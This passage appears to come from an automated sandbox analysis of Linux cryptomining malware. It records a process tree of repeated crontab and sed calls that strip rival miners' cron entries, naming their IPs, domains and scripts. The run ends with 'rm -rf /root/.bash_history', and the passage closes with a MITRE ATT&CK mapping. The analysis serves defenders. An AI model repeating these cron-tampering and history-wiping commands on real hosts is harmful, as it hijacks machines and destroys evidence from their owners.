  PID:1052
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1055
- /bin/sed
  sed /shuf/d
  2⤵
  PID:1056
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1057
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1061
- /bin/sed
  sed /ash/d
  2⤵
  PID:1062
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1063
- /bin/sed
  sed /mr.sh/d
  2⤵
  PID:1068
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1067
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1069
- /bin/sed
  sed /185.181.10.234/d
  2⤵
  PID:1073
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1074
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1072
- /bin/sed
  sed /localhost.xyz/d
  2⤵
  PID:1079
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1078
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1080
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1084
- /bin/sed
  sed /45.137.151.106/d
  2⤵
  PID:1085
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1086
- /bin/sed
  sed /111.90.159.106/d
  2⤵
  PID:1088
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1087
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1089
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1090
- /bin/sed
  sed /github/d
  2⤵
  PID:1091
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1092
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1093
- /bin/sed
  sed /bigd1ck.com/d
  2⤵
  PID:1094
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1095
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1096
- /bin/sed
  sed /xmr.ipzse.com/d
  2⤵
  - System Network Configuration Discovery
  PID:1097
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1098
- /bin/sed
  sed /185.181.10.234/d
  2⤵
  PID:1100
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1099
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1101
- /bin/sed
  sed /146.71.79.230/d
  2⤵
  PID:1103
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1104
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1102
- /bin/sed
  sed /122.51.164.83/d
  2⤵
  PID:1106
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1105
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1107
- /bin/sed
  sed /newdat.sh/d
  2⤵
  PID:1109
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1108
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1110
- /bin/sed
  sed /lib.pygensim.com/d
  2⤵
  PID:1112
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1111
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1113
- /bin/sed
  sed /t.amynx.com/d
  2⤵
  PID:1115
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1114
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1116
- /bin/sed
  sed /update.sh/d
  2⤵
  PID:1118
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1119
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1117
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1120
- /bin/sed
  sed /systemd-service.sh/d
  2⤵
  PID:1121
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1122
- /bin/sed
  sed /pg_stat.sh/d
  2⤵
  PID:1124
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1123
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1125
- /bin/sed
  sed /sleep/d
  2⤵
  PID:1127
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1126
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1128
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1129
- /bin/sed
  sed /oka/d
  2⤵
  PID:1130
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1131
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1132
- /bin/sed
  sed /linux1213/d
  2⤵
  PID:1133
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1134
- /bin/sed
  sed "/#wget/d"
  2⤵
  PID:1136
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1135
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1137
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1138
- /bin/sed
  sed "/#curl/d"
  2⤵
  PID:1139
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1140
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1141
- /bin/sed
  sed /zsvc/d
  2⤵
  PID:1142
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1143
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1144
- /bin/sed
  sed /givemexyz/d
  2⤵
  PID:1145
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1146
- /usr/bin/crontab
  crontab -l
  2⤵
  - Reads runtime system information
  PID:1147
- /bin/sed
  sed /world/d
  2⤵
  PID:1148
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1149
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1150
- /bin/sed
  sed /1.sh/d
  2⤵
  PID:1151
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1152
- /bin/sed
  sed /3.sh/d
  2⤵
  PID:1154
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1153
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1155
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1156
- /bin/sed
  sed /workers/d
  2⤵
  PID:1157
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1158
- /bin/sed
  sed /oracleservice/d
  2⤵
  PID:1160
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1159
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1161
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1162
- /bin/grep
  grep -v grep
  2⤵
  PID:1164
- /bin/grep
  grep -e 185.191.32.198
  2⤵
  PID:1163
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1166
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:1167
- /bin/rm
  rm -rf /root/.bash_history
  2⤵
  PID:1168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Shared Modules

T1129

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking